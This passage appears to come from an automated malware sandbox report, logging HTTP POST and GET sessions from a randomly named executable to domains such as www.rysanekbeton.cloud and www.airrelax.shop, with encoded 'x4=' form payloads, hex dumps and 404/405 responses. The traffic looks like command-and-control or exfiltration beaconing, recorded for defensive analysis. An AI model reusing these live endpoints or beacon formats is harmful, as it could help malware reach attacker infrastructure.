                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 55 34 67 37 36 62 36 70 55 79 46 70 70 62 61 31 75 66 6f 71 36 5a 63 48 39 52 53 4e 31 53 4f 48 34 33 5a 52 55 4b 37 51 34 63 33 2f 48 63 6e 61 65 64 30 73 72 73 2f 74 31 7a 2b 36 37 48 36 4a 57 71 4e 67 38 45 6f 52 6e 35 33 57 69 35 32 79 42 7a 54 41 30 71 38 61 59 36 41 76 7a 39 4d 36 43 6d 34 52 55 66 58 55 45 4f 50 6e 70 51 4f 57 77 7a 49 4b 38 30 63 39 4d 43 51 69 6f 58 6f 52 77 43 31 55 64 6f 6b 39 6f 58 4a 53 4e 4a 59 55 51 68 6d 4a 43 48 55 78 37 72 4e 4f 58 77 4b 4b 49 30 39 47 51 4b 46 44 44 66 6f 58 7a 6c 4e 31 64 38 58 71 76 77 7a 51 2b 58 66 46 45 38 50 6c 37 46 71 66 78 63 37 43 63 43 34 6a 53 47 61 48 4f 41 37 39 71 55 6c 59 41 66 77 45 2f 63 7a 77 69 39 34 58 48 65 6a 4d 67 30 56 6e 43 6a 4c 54 73 56 41 4f 75 41 4b 4d 54 57 73 55 72 70 2b 32 6b 73 41 2b 61 33 4a 76 6d 38 52 6e 49 64 59 56 67 73 50 42 55 72 6d 6c 47 76 63 6f 79 2b 43 53 55 38 57 55 4e 5a 66 61 79 65 74 74 77 4e 6d 34 51 6c 6f 67 4c 47 70 78 46 4c 6b 34 65 50 6f 57 53 66 64 46 57 67 56 6d 61 5a 56 6d 61 46 6a [TRUNCATED]
                                                                                                            Data Ascii: x4=U4g76b6pUyFppba1ufoq6ZcH9RSN1SOH43ZRUK7Q4c3/Hcnaed0srs/t1z+67H6JWqNg8EoRn53Wi52yBzTA0q8aY6Avz9M6Cm4RUfXUEOPnpQOWwzIK80c9MCQioXoRwC1Udok9oXJSNJYUQhmJCHUx7rNOXwKKI09GQKFDDfoXzlN1d8XqvwzQ+XfFE8Pl7Fqfxc7CcC4jSGaHOA79qUlYAfwE/czwi94XHejMg0VnCjLTsVAOuAKMTWsUrp+2ksA+a3Jvm8RnIdYVgsPBUrmlGvcoy+CSU8WUNZfayettwNm4QlogLGpxFLk4ePoWSfdFWgVmaZVmaFjmKtp0hydMUIqZ4Lhg3MulaqYiKiCVayt4AJueibc0MiqrFT2ICNjIjgBda66xO3z4+0+hOM95biZPt8D1Pif+jUhq+vutpe7i5Z4RfGf6nWBYPZggluCQ6dLkwA85594KagYC2h8gnPy243wgo1VkWURg9RhNUtCtWO32dCEGgM8njQf5gy5v3xZHjnhGbBeyaf1UGAC/pT/6ngBPqR7H3nzPJIT30pngYaWMXmf8+XXPYXl7Pcu+wHX5yICoBu/6e3jAdtbf9CQ91tygt0cHZC8Cu4D5U4Ekh/z5b7R3KexjxEZ3s4LNLI/iz1nHwUomcZySFQJTxLVpzVIV4AB8ez5U/cHEjJsEbO2MeZ72lqYgDKzkQ1UFlxnG8wBpgQXcfaaqTu5HpWOoenEj9gKg5+cOJdVuKgeaj2RcgHWpUffbSf5MN+Vcnxtnn8XQVZIG0TyTktmX4iAJSkuVCCfawkr3vCGohTiOItk44nUPkr+iKUHlT0Z5ujUDPdn6R5qhplU3fb1rEngTSuJOS9Ymg0SJy32Yhmoh+qekx0otTsL/hmuDYu8InQyUgOeImfnqpUliQZmGQW8m/LxhPGiu0OdCixfeAXPyqe78zzehr7PHW0a4e+BXjXscANPuAVX1C+TQjaaQxp/Wc7nYCms9BewSqEaAPowaI [TRUNCATED]
                                                                                                            Dec 12, 2024 10:23:12.245501041 CET312OUTData Raw: 54 77 76 50 44 43 30 37 50 77 50 2b 38 76 41 67 57 6e 58 73 44 49 69 38 42 4a 43 46 66 6a 75 61 4b 42 46 57 73 76 64 32 72 6c 53 6a 34 52 78 6d 46 6e 6e 30 72 61 71 73 68 73 47 67 44 33 52 2b 4c 72 4e 6d 4a 71 59 67 37 61 67 63 54 48 35 78 4e 2b
                                                                                                            Data Ascii: TwvPDC07PwP+8vAgWnXsDIi8BJCFfjuaKBFWsvd2rlSj4RxmFnn0raqshsGgD3R+LrNmJqYg7agcTH5xN+OjlE/klxXBP107eIEhcCix6itnG70SxrMlVhq5/8mFzJkVu6X36KcMx/jrCW5iIuneN1Us1C8g8sswtHemCDhBEDFUlQUpTv1mjcHHDvgYUdpryPlK4d8hCiDb9ac6Sl/P8ZzaciZjzManljTBrhhRdcdt6eWcvir
                                                                                                            Dec 12, 2024 10:23:13.404472113 CET355INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 09:23:13 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            39192.168.2.224920481.2.196.19801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:14.780477047 CET823OUTPOST /k6bb/ HTTP/1.1
                                                                                                            Host: www.rysanekbeton.cloud
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.rysanekbeton.cloud
                                                                                                            Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 55 34 67 37 36 62 36 70 55 79 46 70 70 63 32 31 76 4b 55 71 36 35 63 48 38 52 53 4e 75 69 4f 4e 34 33 46 7a 55 4f 71 4c 2f 72 6a 2f 48 4e 33 61 65 50 73 73 6f 73 2f 75 74 6a 2f 78 34 33 36 51 57 71 4e 47 38 46 55 52 6e 39 6e 57 74 36 4f 79 57 43 54 44 37 36 38 55 56 61 41 55 7a 39 78 4d 43 6d 30 42 55 66 50 55 45 4d 4c 6e 6f 51 65 57 31 56 63 4b 32 6b 63 42 62 53 51 31 6f 58 73 45 77 43 6c 4d 64 6f 49 39 6f 69 52 53 4e 63 6b 55 55 32 53 4a 56 58 55 77 32 4c 4d 59 66 54 6e 74 47 56 74 6f 57 70 4e 41 64 65 31 79 37 47 5a 56 53 74 58 41 34 44 6e 74 33 41 48 51 43 65 53 68 67 41 3d 3d
                                                                                                            Data Ascii: x4=U4g76b6pUyFppc21vKUq65cH8RSNuiON43FzUOqL/rj/HN3aePssos/utj/x436QWqNG8FURn9nWt6OyWCTD768UVaAUz9xMCm0BUfPUEMLnoQeW1VcK2kcBbSQ1oXsEwClMdoI9oiRSNckUU2SJVXUw2LMYfTntGVtoWpNAde1y7GZVStXA4Dnt3AHQCeShgA==
                                                                                                            Dec 12, 2024 10:23:16.058168888 CET355INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 09:23:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            40192.168.2.224920581.2.196.19801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:17.444489956 CET2472OUTPOST /k6bb/ HTTP/1.1
                                                                                                            Host: www.rysanekbeton.cloud
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.rysanekbeton.cloud
                                                                                                            Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 55 34 67 37 36 62 36 70 55 79 46 70 70 38 6d 31 6a 4e 41 71 37 5a 63 45 6c 68 53 4e 31 53 4f 42 34 33 5a 7a 55 4b 37 51 34 5a 50 2f 48 63 37 61 65 74 30 73 71 73 2f 75 72 6a 2b 36 37 48 36 4b 57 71 5a 77 38 45 6c 73 6e 37 2f 57 69 37 65 79 42 77 4c 41 31 71 38 61 45 4b 41 58 7a 39 77 49 43 6d 6b 46 55 66 4c 75 45 4d 44 6e 6f 6a 36 57 7a 6c 63 46 71 55 63 42 62 53 51 48 6f 58 73 6b 77 43 38 4a 64 70 51 74 6f 55 39 53 4d 35 59 55 57 52 6d 49 64 33 55 30 2f 72 4e 51 58 77 47 6a 49 30 39 43 51 4b 51 6d 44 66 30 58 78 33 46 31 64 37 44 70 78 77 7a 54 77 33 66 46 4b 63 50 72 37 46 71 44 78 63 37 43 63 43 30 6a 51 57 61 48 4f 45 50 36 70 6b 6c 59 66 76 77 7a 79 38 33 4b 69 2b 45 31 48 64 37 6d 68 44 31 6e 44 6c 2f 54 6f 6c 41 4f 2b 67 4b 4f 54 57 73 38 67 4a 2b 71 6b 73 34 32 61 78 70 2f 6d 38 52 6e 49 65 51 56 6b 36 62 42 64 62 6d 6c 4f 50 63 54 35 65 43 54 55 38 6a 48 4e 61 44 61 79 63 64 74 77 37 65 34 57 67 38 76 54 47 70 77 53 37 6b 36 61 50 6f 48 53 66 41 67 57 67 64 41 61 59 6c 6d 61 41 33 [TRUNCATED]
                                                                                                            Data Ascii: x4=U4g76b6pUyFpp8m1jNAq7ZcElhSN1SOB43ZzUK7Q4ZP/Hc7aet0sqs/urj+67H6KWqZw8Elsn7/Wi7eyBwLA1q8aEKAXz9wICmkFUfLuEMDnoj6WzlcFqUcBbSQHoXskwC8JdpQtoU9SM5YUWRmId3U0/rNQXwGjI09CQKQmDf0Xx3F1d7DpxwzTw3fFKcPr7FqDxc7CcC0jQWaHOEP6pklYfvwzy83Ki+E1Hd7mhD1nDl/TolAO+gKOTWs8gJ+qks42axp/m8RnIeQVk6bBdbmlOPcT5eCTU8jHNaDaycdtw7e4Wg8vTGpwS7k6aPoHSfAgWgdAaYlmaA3mPId0hCdLW4qdyb9W3MmHarJdKgGVajt4X6KR+bc6cyqbOz33COOEjhhdGbixN2T46Hm+P88QMyZYmcCiPi7YjVxA+86tou7i78kSDGf/9GBOBJgMluDh6cr0wxE555EKbzwC2h8hgPz9xX9Fo1JgWUdw9SJNV8StWNv2GSEG6c8a6geOgyt/3zZxgWFGbnayW7VUNAC9rT/5pABBqRrH3mHfJLT3x8bgY7WMO2f4y3WRYXkAPc6iwD7pyKWoBv/6JmjAXNa4/CQ5+NyDt0EXZCoou975Spkkuuz5U7R1F+xj+kZGs4TdLNPYz0vHwmAmQpyNJwJS8rVqllIH4Ax8ez9U/d/Ei6EEc5iMBZ7066ZxKq2DQ1EzlwSL8yVphBXccYC1We5BsWOiJ3EH9gL05/FDKvduKyWav01dhnWuGffIc/5GN6xynzx3nPzQVY4G0gaTjdmX4iAKSkuOCCbowhuQvCGohCiOI/c43HVHoL/+bkH3T1ISun5UPdL6XoKhplUwCb1oe3gSSv1pS9YYg0eJyBOYzFwh9JmklEotUsL4oGuAYu8YnR+EgKyInvHqsXNhWZmHAm8Kxr0hPGuM0LNCjCLeDi7ypu78ozeukrOfZUe8e+d9jW9XA8fuAmf1RtrX6aaRsZ/Uc7rCCmk1Bf5tqD+AMIwaT [TRUNCATED]
                                                                                                            Dec 12, 2024 10:23:17.565887928 CET1776OUTData Raw: 61 67 75 47 43 43 31 68 42 51 4f 6d 38 76 41 30 57 6a 37 38 44 4b 57 38 42 49 69 46 66 41 32 61 4c 68 46 56 75 76 64 7a 72 6c 53 35 34 51 55 4d 46 6d 4b 78 72 63 75 73 68 50 4f 67 42 41 74 2b 56 72 4e 67 4a 71 59 71 30 36 38 54 54 48 35 4c 4e 2f
                                                                                                            Data Ascii: aguGCC1hBQOm8vA0Wj78DKW8BIiFfA2aLhFVuvdzrlS54QUMFmKxrcushPOgBAt+VrNgJqYq068TTH5LN/qjlEvklyvBPF04d4EkUiiygSs4G70exvAPVjm5/uOF6YkVpKX1tadI1/fACXFUIuXgMGQszxEg5eEw63ejIjgBEDYalT96TtMBjNLHA/gYQfxo2Pl2ut9hCiD39Z8+SnLf8Yracn1jz8agmTTDohhXdcRI6efNvi7
                                                                                                            Dec 12, 2024 10:23:18.719711065 CET355INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 09:23:18 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            41192.168.2.224920681.2.196.19801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:20.097759008 CET547OUTGET /k6bb/?e2E=wRQ8oHXx&x4=Z6Ib5suwfioT2MqU06AO+PAui2zXunW520tiYNnV3r2mKqn+I/1Rk8X6nyOI9yPQWIZ7sVBW06SOuYuNHwSa/K8QYKA8w9Q0BnY6RfjXUsKFmlTp4Coq9mQ/L3NZ HTTP/1.1
                                                                                                            Host: www.rysanekbeton.cloud
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:23:21.379368067 CET691INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 09:23:21 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 548
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            42192.168.2.2249207172.67.215.235801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:23:26.874097109 CET2472OUTPOST /gvzg/ HTTP/1.1
                                                                                                            Host: www.airrelax.shop
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.airrelax.shop
                                                                                                            Referer: http://www.airrelax.shop/gvzg/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 36 62 46 4c 79 69 68 6f 38 4a 59 69 79 66 67 78 79 77 35 55 63 67 4c 6d 47 6f 32 77 35 49 79 36 76 64 72 4b 6b 49 36 73 39 72 47 63 64 4a 62 6c 66 5a 42 52 64 61 2b 4c 54 77 56 79 68 2b 41 56 6e 68 35 2b 67 4d 49 56 76 39 51 2f 50 42 4a 51 33 61 2f 47 2b 72 44 66 39 39 37 6e 36 61 68 38 52 73 4a 74 49 46 4a 6a 32 47 54 64 55 6c 6d 70 35 6b 39 61 69 6a 59 57 4b 64 6c 57 66 57 75 51 6c 79 64 39 4a 63 55 2b 32 76 49 4d 50 61 55 68 30 59 6b 6e 34 62 50 79 67 30 5a 43 51 37 49 6c 4f 63 5a 53 32 69 44 4e 72 79 6f 2f 34 43 66 75 63 67 39 73 77 51 4d 77 42 70 71 4e 4b 2b 34 74 41 73 69 2b 74 47 72 4c 59 6f 50 53 55 32 50 53 5a 4a 37 42 6c 39 71 73 2f 33 63 5a 38 53 4a 44 48 74 70 49 67 31 6a 35 32 58 66 76 52 50 69 69 72 45 2f 4c 6e 58 52 37 59 50 75 5a 57 6b 4e 66 2f 74 65 66 74 6c 61 45 6a 4d 41 45 6b 30 41 2b 30 7a 38 74 6d 64 54 6d 7a 64 39 69 30 6f 48 6a 61 39 2f 56 44 34 76 62 6d 68 6a 36 48 59 64 58 2f 6b 51 4a 2b 30 61 6c 4c 55 68 69 6c 32 47 4f 4d 36 46 6c 49 54 73 79 69 46 56 64 6f 6a 41 [TRUNCATED]
                                                                                                            Data Ascii: x4=6bFLyiho8JYiyfgxyw5UcgLmGo2w5Iy6vdrKkI6s9rGcdJblfZBRda+LTwVyh+AVnh5+gMIVv9Q/PBJQ3a/G+rDf997n6ah8RsJtIFJj2GTdUlmp5k9aijYWKdlWfWuQlyd9JcU+2vIMPaUh0Ykn4bPyg0ZCQ7IlOcZS2iDNryo/4Cfucg9swQMwBpqNK+4tAsi+tGrLYoPSU2PSZJ7Bl9qs/3cZ8SJDHtpIg1j52XfvRPiirE/LnXR7YPuZWkNf/teftlaEjMAEk0A+0z8tmdTmzd9i0oHja9/VD4vbmhj6HYdX/kQJ+0alLUhil2GOM6FlITsyiFVdojA9XgKQwr35EJwy1gvwngRn2Nbye2EB3jBi/tTNwSWtt+G6Pr5QjAQTsw0jPkEfmKkFTFtCu2Ujps3ns0HL9sRRTGp17jaBuu+25rjp1kLpGfnwpolYDfYltjMqYrd5NSCcBp5cKoPmfKWv/0Uz1LwH+OyGnz/QRq7jD4zMzmNssw8Wlfaq3LSDBmdIbgLmFIUp7AhiX5dZkXIn2vJ6+GeOgC+Y7yygcepxvD/o5xasYm/h44g/9ykG2W1tedwtWxodXUjger9eOBiNoftm57+LtXQImLBbEHioR8vUXYBjF0EFs3HVCMWRptZBImb3VCHZbWxA8wur+fyyp/sRageEOFW9PVMn8P6IAVdWPQeMCbfNBtgYzdAOjAiksQcI+sUit+Q0xhZm+94ly21UCZe4xqBKee9M0GSMC89+z96BKcnG0EvD2nW/9dSVUQUbWspE8GZKdNYkFUvEtpKpzUm5i6B3XaJcF/JucpNJwnyLBmnwtxZQFv37HPKPUMe/Pwh2EiWaXOrLqLmv67+OteozLEVuvkHXsMUeTG/33dALYU3jrZKNlpmaR/goC+fe2XS7uVtNjMlBAKrZOlaUWIixqlrx7eVONBkHA+CRsaIY4T1uvP24ZYaiG+pD4xWLuriZ9prdwXMeBBbRsctHF53cGaM+LZl4UIEqE [TRUNCATED]
                                                                                                            Dec 12, 2024 10:23:26.993562937 CET297OUTData Raw: 6b 35 37 62 36 6f 46 6a 68 54 56 6f 50 53 6f 54 65 38 73 70 77 65 5a 78 64 50 4a 46 43 62 74 42 6d 6c 54 36 59 6d 48 54 43 50 65 6c 58 77 61 2b 39 6d 59 68 6e 41 73 64 45 4a 33 41 63 51 4b 33 56 2b 6c 4d 47 74 54 56 76 6e 42 72 70 39 71 6d 6a 66
                                                                                                            Data Ascii: k57b6oFjhTVoPSoTe8spweZxdPJFCbtBmlT6YmHTCPelXwa+9mYhnAsdEJ3AcQK3V+lMGtTVvnBrp9qmjf4ZeobaYpfttdHuTDFqtDa9O0wtElaDj8sEOJ7LDWsFtwMIHcldpoG6MrYC/kyckgLg8zKD9fNzpMDev/3NZ5qiFmULxOw/iOvjDjqBe0OhVqQgw9N5eCLlh0DwhMnMMUjQrs3MVpNSZmMYOMEm682k9E1Kfd8sTx0
                                                                                                            Dec 12, 2024 10:23:28.043258905 CET1236INHTTP/1.1 405 Not Allowed
                                                                                                            Date: Thu, 12 Dec 2024 09:23:27 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFPT%2Fwia1vBxDhQJW7JEVvRlOkxN1mBLJpIjO7EV7ZJAEsgyiBhM16j%2Bdmk0%2BxZYS6g72lrwPmDiePAj96%2F%2FmN0G5F4%2FOaK%2BhmQfXFD7rId%2FLFNKgHyd%2BJO8%2B4ODOuo4e1GLng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f0ca7e21b037287-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2009&rtt_var=1004&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2769&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding
